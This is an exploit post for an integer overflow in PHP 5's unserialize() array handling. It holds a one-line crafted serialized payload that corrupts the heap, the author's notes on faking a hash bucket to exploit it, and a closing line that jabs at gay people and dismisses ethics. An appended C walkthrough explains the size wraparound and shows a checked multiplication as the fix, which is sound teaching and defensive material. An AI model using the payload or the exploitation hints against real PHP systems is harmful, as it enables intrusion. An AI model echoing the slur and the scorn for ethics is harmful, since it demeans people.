PHP 5 ecalloc memory manager unserialize() array integer overflow proof of concept exploit.
d4d2a7ebf01f65bf0871fe99b935491efb8bb3a3e3e029d5317331679ec0f317
<?php
// PoC: the declared element count 1073741823 (2^30 - 1) is used to size the
// array's hash table in zend_hash_init(); the element-count * sizeof(Bucket *)
// product handed to ecalloc() overflows on a 32-bit build.
print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));
?>
In zend_hash_init() an int overflow (in ecalloc()) -> heap overflow.
Here it segfaults in zend_hash_find(), but it's possible to fake the bucket and
exploit zend_hash_del_index_or_key().
I tried a memory dump, just faking the bucket with the pointer of the
$GLOBALS's bucket, but it segfaults before that in memory_shutdown...
don't cry a river :P
ethic is for gayz
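The arithmetic behind the PoC, as an added example that is not part of the original post: the element count from "a:1073741823:" is rounded up to a power of two the way PHP 5's zend_hash_init() does it, and that slot count is multiplied by sizeof(Bucket *) to get the ecalloc() request. The code models a 32-bit build (size_t and sizeof(Bucket *) = 4 are assumptions stated in the comments) by doing the size math in uint32_t, so it shows the wrap on any host. The rounding loop and the minimum table size of 8 are modelled on the PHP 5 source; the checked variant next to the unchecked one is the fix shape a practitioner would want, not PHP's own patch.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Assumption: a 32-bit build, so size_t is 32 bits wide. Typed explicitly so
 * the wrap is reproduced on a 64-bit host as well. */
typedef uint32_t size32_t;

/* Assumption: sizeof(Bucket *) on that 32-bit build. */
#define SIZEOF_BUCKET_PTR 4u

/* Modelled on PHP 5's zend_hash_init(): the requested element count is rounded
 * up to a power of two (minimum 8) and capped at 0x80000000. */
size32_t zend_table_size(size32_t nSize)
{
    unsigned i = 3;
    if (nSize >= 0x80000000u)
        return 0x80000000u;
    while ((1u << i) < nSize)
        i++;
    return 1u << i;
}

/* The unchecked product an ecalloc(nmemb, size) computes before asking the
 * allocator for that many bytes: on 32-bit it silently wraps modulo 2^32. */
size32_t unchecked_calloc_bytes(size32_t nmemb, size32_t size)
{
    return nmemb * size;
}

/* Hardened form: refuse the request when nmemb * size is not representable,
 * instead of allocating a tiny buffer the caller believes is huge. */
bool checked_calloc_bytes(size32_t nmemb, size32_t size, size32_t *out)
{
    if (size != 0 && nmemb > UINT32_MAX / size)
        return false;
    *out = nmemb * size;
    return true;
}

/* Walks the PoC's numbers: a:1073741823 -> 2^30 slots -> 0-byte allocation,
 * which the hash code then indexes as if it held 2^30 bucket pointers. */
size32_t poc_buffer_bytes(void)
{
    size32_t slots = zend_table_size(1073741823u);
    return unchecked_calloc_bytes(slots, SIZEOF_BUCKET_PTR);
}

int main(void)
{
    size32_t slots = zend_table_size(1073741823u);
    size32_t bytes;

    printf("requested %u elements -> nTableSize %u (0x%x)\n",
           1073741823u, slots, slots);
    printf("unchecked ecalloc size: %u bytes\n",
           unchecked_calloc_bytes(slots, SIZEOF_BUCKET_PTR));
    if (!checked_calloc_bytes(slots, SIZEOF_BUCKET_PTR, &bytes))
        printf("checked ecalloc: refused, nmemb * size overflows 32-bit size_t\n");
    return 0;
}
```

The check `nmemb > UINT32_MAX / size` is the portable form; with a modern compiler `__builtin_mul_overflow()` does the same job in one call. The point of the checked variant is that the failure becomes an allocation error at the call site rather than an undersized buffer discovered later in zend_hash_find().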